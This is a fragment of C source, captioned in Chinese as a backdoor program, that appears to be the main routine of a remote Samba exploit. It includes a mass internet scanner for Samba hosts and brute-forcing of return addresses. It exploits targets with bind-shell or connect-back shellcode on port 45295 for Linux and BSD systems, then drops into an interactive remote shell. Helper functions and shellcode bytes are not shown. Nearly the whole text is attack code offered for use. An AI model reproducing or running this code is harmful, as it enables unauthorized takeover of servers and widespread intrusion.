samd.c

一个用C语言写的后门程序

	
				break;
			case 'C':
				MAX_CHILDS = atoi(optarg);
				if (MAX_CHILDS == 0) {
					fprintf(stderr, "Invalid number of childs.\n");
					return -1;
				}

				if (MAX_CHILDS > 99) {
					fprintf(stderr, "Too many childs, using 99. \n");
					MAX_CHILDS = 99;
				}

				break;
			case 'd':
				BRUTE_DELAY = atoi(optarg);
				break;
			case 'f':
				force = 1;
				break;
                        case 'p':
                                port = atoi(optarg);
                                if ((port <= 0) || (port > 65535)) {
                                        fprintf(stderr, "Invalid port.\n\n");
                                        return -1;
                                }
                                break;
			case 'r':
				ret = strtoul(optarg, &optarg, 16);
				break;
			case 's':
				random 	= 1;
				scan 	= 1;
				break;
			case 'S':
				random 	= 0;
				scan	= 1;
				sscanf(optarg, "%d.%d.%d", &ip1, &ip2, &ip3);
				ip3--;
				break;
                        case 't':
                                type = atoi(optarg);
                                if (type == 0 || type > sizeof(targets) / 16) {
                                        for(i = 0; i < sizeof(targets) / 16; i++)
                                                fprintf(stdout, "%02d. %s           [0x%08x]\n", i + 1,

                                                                targets[i].type, (unsigned int) targets[i].ret);
                                        fprintf(stderr, "\n");
                                        return -1;
                                }
                                break;
			case 'v':
				verbose = 1;
				break;
                        default:
                                usage(argv[0] == NULL ? "sambal" : argv[0]);
                                break;
                }

        }
	
	if ((argv[optind] == NULL && scan == 0) || (type == 0 && brute == -1 && scan == 0)) 
		usage(argv[0] == NULL ? "sambal" : argv[0]);

	if (scan == 1) 
		
	if (verbose == 1)
		fprintf(stdout, "+ Verbose mode.\n");

	if (scan == 1) {

		srand(getpid());

		while (1) {

			if (random == 1) {
				ip1 = rand() % 255;
				ip2 = rand() % 255;
				ip3 = rand() % 255; } 
			else {
				ip3++;
				if (ip3 > 254) { ip3 = 1; ip2++; }
				if (ip2 > 254) { ip2 = 1; ip1++; }
				if (ip1 > 254) exit(0);
			}

			for (ip4 = 0; ip4 < 255; ip4++) {
				i++;
				snprintf(scan_ip, sizeof(scan_ip) - 1, "%u.%u.%u.%u", ip1, ip2, ip3, ip4);
				usleep(BRUTE_DELAY);

				switch (fork()) {
					case 0:
						switch(is_samba(scan_ip, 2)) {
							case 0:
								fprintf(stdout, "%s\n", scan_ip);
								break;
							case 1:
								
								break;
							default:
								break;	
						}

						exit(0);
						break;
					case -1:
						fprintf(stderr, "+ fork() error\n");
						exit(-1);
						break;
					default:
						if (i > MAX_CHILDS - 2) { 
							wait(&status); 
							i--;
						}
						break;
				}
			}

		}

		return 0;
	}


	he = gethostbyname(argv[optind]);

        if (he == NULL) {
		fprintf(stderr, "Unable to resolve %s...\n", argv[optind]);
		return -1;
	}

	if (brute == -1) {

		if (ret == 0) ret = targets[type - 1].ret;

		shellcode = targets[type - 1].shellcode;
		
		if (connectback == 1) {
			fprintf(stdout, "+ connecting back to: [%d.%d.%d.%d:45295]\n", 
					ip1, ip2, ip3, ip4);

			switch(targets[type - 1].os_type) {
				case 0:	/* linux */
					shellcode = linux_connect_back;
					break;
				case 1:	/* FreeBSD/NetBSD */
					shellcode = bsd_connect_back;
					break;
				case 2: /* OpenBSD */
					shellcode = bsd_connect_back;
					break;
				case 3: /* OpenBSD 3.2 Non-exec stack */
					shellcode = bsd_connect_back;
					break;
			}

		}

		if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
			fprintf(stderr, "+ socket() error.\n");
			return -1;
		}

       		if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
       		        fprintf(stderr, "+ socket() error.\n");
       	        	return -1;
	        }

       		memcpy(&addr1.sin_addr, he->h_addr, he->h_length);
		memcpy(&addr2.sin_addr, he->h_addr, he->h_length);

       		addr1.sin_family = AF_INET;
       		addr1.sin_port	 = htons(port);	
 		addr2.sin_family = AF_INET;
        	addr2.sin_port   = htons(45295);

		if (connect(sock, (struct sockaddr *)&addr1, sizeof(addr1)) == -1) { 
			fprintf(stderr, "+ connect() error.\n");
			return -1;
		}
			
		if (verbose == 1) fprintf(stdout, "+ %s\n", targets[type - 1].type);

		if (force == 0) {

			if (is_samba(argv[optind], 2) != 0) {
				fprintf(stderr, "+ Host is not running samba!\n\n");
				return -1;
			}

			
		}

		if (verbose == 1) fprintf(stdout, "+ Connected to [%s:%d]\n", (char *)inet_ntoa(addr1.sin_addr), port);

		if (start_session(sock) < 0) fprintf(stderr, "+ Session failed.\n");

		if (verbose == 1) fprintf(stdout, "+ Session enstablished\n");
		sleep(5);
		if (targets[type - 1].os_type != 2) {
			if (exploit_normal(sock, ret, shellcode) < 0) {
				fprintf(stderr, "+ Failed.\n");
				close(sock);
			}
		} else {
                        if (exploit_openbsd32(sock, ret, shellcode) < 0) {
                                fprintf(stderr, "+ Failed.\n");
                                close(sock);
			}
		}

		sleep(2);

		if (connectback == 0) {
        		if(connect(sock2, (struct sockaddr *)&addr2, sizeof(addr2)) == -1) {
                		fprintf(stderr, "+ Exploit failed, try -b to bruteforce.\n");

                		return -1;
        		}

			
		
       			shell(sock2);
			close(sock);
        		close(sock2);
		} else {
			fprintf(stdout, "+ Done...\n");
			close(sock2);
			close(sock);
		}
		return 0;
	}
		
	signal(SIGPIPE, SIG_IGN);
	signal(SIGUSR1, handler);

	switch(brute) {
		case 0:
			if (ret == 0) ret = 0xc0000000;
			shellcode = linux_bindcode;
			
			break;
		case 1:
			if (ret == 0) ret = 0xbfc00000;
			shellcode = bsd_bindcode;
                        
			break;
		case 2:
			if (ret == 0) ret = 0xdfc00000;
			shellcode = bsd_bindcode;
			
			break;
		case 3:
			if (ret == 0) ret = 0x00170000;
			shellcode = bsd_bindcode;
			fprintf(stdout, "+ Bruteforce mode. (OpenBSD 3.2 - non-exec stack)\n");
			break;
		}

        memcpy(&addr1.sin_addr, he->h_addr, he->h_length);
	memcpy(&addr2.sin_addr, he->h_addr, he->h_length);

	addr1.sin_family = AF_INET;
        addr1.sin_port   = htons(port);
        addr2.sin_family = AF_INET;
        addr2.sin_port   = htons(45295);

	for (i = 0; i < 100; i++)
		childs[i] = -1;
	i = 0;

        if (force == 0) {
                if (is_samba(argv[optind], 2) != 0) {
                        
                	return -1;
                }

        	
        }

	while (OWNED == 0) {

		if (sock  > 2) close(sock);
		if (sock2 > 2) close(sock2);

                if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
			if (verbose == 1) fprintf(stderr, "+ socket() error.\n");
		}
		else {	
			ret -= STEPS;
			i++;
		}

                if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0)
			if (verbose == 1) fprintf(stderr, "+ socket() error.\n");


		if ((ret & 0xff) == 0x00 && brute != 3) ret++;

		if (verbose == 1) fprintf(stdout, "+ Using ret: [0x%08x]\n", (unsigned int)ret);

		usleep(BRUTE_DELAY);

		switch (childs[i] = fork()) {
                	case 0:
				if(Connect(sock, (char *)inet_ntoa(addr1.sin_addr), port, 2) == -1) {
					if (sock  > 2) close(sock);
					if (sock2 > 2) close(sock2);
					exit(-1);
				}

			        if(write_timer(sock, 3) == 1) {
					if (start_session(sock) < 0) {
						if (verbose == 1) fprintf(stderr, "+ Session failed.\n");
                                                if (sock  > 2)close(sock);
                                                if (sock2 > 2) close(sock2);
                                                exit(-1);
                                        }

                                        if (brute == 3) {
                                                if (exploit_openbsd32(sock, ret, shellcode) < 0) {
                                                        if (verbose == 1) fprintf(stderr, "+ Failed.\n");
                                                        if (sock  > 2) close(sock);
                                                        if (sock2 > 2) close(sock2);
                                                        exit(-1);
                                                }
                                        } 
                                else {
                                        if (exploit_normal(sock, ret, shellcode) < 0) {
                                                if (verbose == 1) fprintf(stderr, "+ Failed.\n");
                                                if (sock  > 2) close(sock);
                                                if (sock2 > 2) close(sock2);
                                                exit(-1);
                                        }

                                        if (sock > 2) close(sock);

                                        if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
                                                if (sock2 > 2) close(sock2);
                                                exit(-1);
                                        }

                                        if(Connect(sock2, (char *)inet_ntoa(addr1.sin_addr), 45295, 2) != -1) {
                                                if (sock2  > 2) close(sock2);
                                                kill(getppid(), SIGUSR1);
                                        }

                                        exit(1);
                                }


                                exit(0);
                                break;
                        case -1:
                                fprintf(stderr, "+ fork() error\n");
                                exit(-1);
                                break;
                        default:
                                if (i > MAX_CHILDS - 2) {
                                        wait(&status);
                                        i--;
                                }
                                break;
                        }

                }

        }

        return 0;
}